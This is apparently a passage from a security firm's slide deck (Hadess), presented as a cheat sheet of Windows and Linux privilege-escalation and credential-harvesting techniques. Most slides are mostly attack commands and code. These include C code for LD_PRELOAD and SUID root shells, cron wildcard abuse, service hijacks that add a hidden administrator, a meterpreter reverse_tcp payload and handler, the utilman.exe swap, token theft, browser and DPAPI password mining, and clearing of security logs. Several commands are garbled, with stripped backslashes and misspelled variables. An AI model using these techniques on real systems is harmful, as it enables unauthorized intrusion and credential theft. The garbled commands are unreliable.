  • 33. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDPSavedConnections PASSWORD MINING IN RDPSAVEDCONNECTIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 34. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpDPAPI masterkeys PASSWORD MINING IN MASTERKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 35. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpWeb.exe all PASSWORD MINING IN BROWSERS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 36. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SauronEye.exe -d C:UsersvincentDesktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v` PASSWORD MINING IN FILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 37. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname" Import-Module .PowerView.ps1 Get-DomainComputer COMPUTER -Properties ms-mcs- AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime Or PASSWORD MINING IN LDAP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 38. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt execute-assembly /root/SharpClipHistory.exe PASSWORD MINING IN CLIPBOARD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 39. Domain: No Local Admin: Yes OS: Windows Type: Delegate tokens GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT PASSWORD MINING IN GMSA PASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 40. Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens ./fake_rdp.py pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem Or DELEGATE TOKENS VIA RDP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 41. Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens FakeFtpServer fakeFtpServer = new FakeFtpServer(); fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:data")); FileSystem fileSystem = new WindowsFakeFileSystem(); fileSystem.add(new DirectoryEntry("c:data")); fileSystem.add(new FileEntry("c:datafile1.txt", "abcdef 1234567890")); fileSystem.add(new FileEntry("c:datarun.exe")); fakeFtpServer.setFileSystem(fileSystem); fakeFtpServer.start(); DELEGATE TOKENS VIA FTP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 42. Domain: No Local Admin: Yes OS: Windows Type: Phish execute-assembly fakelogonscreen.exe FAKE LOGON SCREEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 43. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Service RogueWinRM.exe -p C:windowssystem32cmd.exe ABUSING WINRM SERVICES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 44. Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Certificate ceritify.exe request /ca:dc.domain.localDC-CA /template:User… Rubeus.exe asktgy /user:CORPitadmin /certificate:C:cert.pfx /password:password CERTIFICATE ABUSE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 45. Domain: No Local Admin: Yes OS: Linux Type: Injection gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles sudo LD_RELOAD=tmp/ldreload.so apache2 id 1. #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } 2. 3. 4. SUDO LD_PRELOAD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 46. Domain: No Local Admin: Yes OS: Linux Type: Injection Mkdir /home/user/.config gcc -shared -o /home/user/.config/libcalc.so - fPIC/home/user/.config/libcalc.c /usr/local/bin/suid-so id 1. 2. #include <stdio.h> #include <stdlib.h> static void inject() _attribute _((constructor)); void inject() { system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } 3. 4. 5. ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 47. Domain: Y/N Local Admin: Yes OS: Windows Type: Injection 1. RemoteDLLInjector64 Or MemJect Or https://github.com/tomcarver16/BOF-DLL-Inject 2. #define PROCESS_NAME "csgo.exe" Or RemoteDLLInjector64.exe pid C:runforpriv.dll Or mandllinjection ./runforpriv.dll pid DLL INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 48. Domain: No Local Admin: Yes OS: Windows Type: Injection hollow svchost.exe pop.bin EARLY BIRD INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 49. Domain: No Local Admin: Yes OS: Windows Type: Injection sec-shinject PID /path/to/bin PROCESS INJECTION THROUGH MEMORY SECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 50. Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh; chmod +x systemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 51. Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh; touch /home/user/ --checkpoint=1; touch /home/user/ --checkpoint-action=exec=shsystemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON WILDCARDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 52. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 53. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 54. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission 1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c; 2. gcc /tmp/services.c -o /tmp/service; 3. export PATH=/tmp:$PATH; 4. /usr/local/bin/sudi-env; id ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #1) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 55. Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p' ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #2) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 56. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege Windows_dll.c: cmd.exe /k net localgroup administrators user /add x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll sc stop dllsvc & sc start dllsvc 1. 2. 3. DLL HIJACKING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 57. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege sc config daclsvc binpath= "net localgroup administrators user /add" sc start daclsvc 1. 2. ABUSING SERVICES VIA BINPATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 58. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe Place common.exe in ‘C:Program FilesUnquoted Path Service’. sc start unquotedsvc 1. 2. 3. ABUSING SERVICES VIA UNQUOTED PATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 59. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v ImagePath /t REG_EXPAND_SZ /d c:tempx.exe /f sc start regsvc 1. 2. ABUSING SERVICES VIA REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 60. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege copy /y c:Tempx.exe "c:Program FilesFile Permissions Servicefilepermservice.exe" sc start filepermsvc 1. 2. ABUSING SERVICES VIA EXECUTABLE FILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 61. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe 2. Place program.exe in ‘C:Program FilesAutorun Program’. ABUSING SERVICES VIA AUTORUN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 62. Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi 2. msiexec /quiet /qn /i C:Tempsetup.msi Or SharpUp.exe AlwaysInstallElevated ABUSING SERVICES VIA ALWAYSINSTALLELEVATED HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 63. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. .load C:devPrivEditorx64ReleasePrivEditor.dll 2. !rmpriv ABUSING SERVICES VIA SECREATETOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 64. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Conjure-LSASS Or syscall_enable_priv 20 ABUSING SERVICES VIA SEDEBUG HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 65. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege injectEtwBypass pid REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 66. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PrimaryTokenTheft.exe pid TokenPlaye.exe --impersonate --pid pid Or ESCALATE WITH DUPLICATETOKENEX HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 67. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege start /realtime SomeCpuIntensiveApp.exe ABUSING SERVICES VIA SEINCREASEBASEPRIORITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 68. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege Just only compile and run SeManageVolumeAbuse ABUSING SERVICES VIA SEMANAGEVOLUME HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 69. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege WRITE_OWNER access to a resource, including files and folders. Run for privilege escalation 1. 2. ABUSING SERVICES VIA SERELABEL HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 70. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U ABUSING SERVICES VIA SERESTORE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 71. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run 2. In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. 3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d ABUSE VIA SEBACKUP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 72. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 73. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll TrustExec.exe -m exec -c "whoami /priv" -f 1. 2. ABUSING VIA SESYSTEMENVIRONMENT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 74. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. takeown.exe /f "%windir%system32" 2. icalcs.exe "%windir%system32" /grant "%username%":F 3. Rename cmd.exe to utilman.exe 4. Lock the console and press Win+U ABUSING VIA SETAKEOWNERSHIP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 75. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PSBits PrivFu psexec.exe -i -s -d cmd.exe 1. Or 2. ABUSING VIA SETCB HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 76. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll CredManBOF TrustExec.exe -m exec -c "whoami /priv" -f 1. Or 2. ABUSING VIA SETRUSTEDCREDMANACCESS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 77. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege JuicyPotato.exe Or https://github.com/decoder-it/juicy_2 https://github.com/antonioCoco/RoguePotato ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 78. Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 1. 2. Or ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 79. HADESS | SECURE AGILE DEVELOPMENT About Hadess Savior of your Business to combat cyber threats Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats. Contact Us To request additional information about Hadess’s services, please fill out the form below. A Hadess representative will contact you shortly. Email: Marketing@hadess.io Phone No. +989362181112 Company No. +982128427515 +982177873383 Website: www.hadess.io hadess_security
  • 80. HADESS | SECURE AGILE DEVELOPMENT Hadess Products and Services Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Penetration Testing | PROTECTION PRO Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Red Teaming Operation | PROTECTION PRO Identifying and helping to address hidden weaknesses in your organization’s security. RASP | Protect Applications and APIs Anywhere Identifying and helping to address hidden weaknesses in your Applications. SAST | Audit Your Products Identifying and helping to address hidden weaknesses in your organization’s security PWN Z1 | Audit Your PPP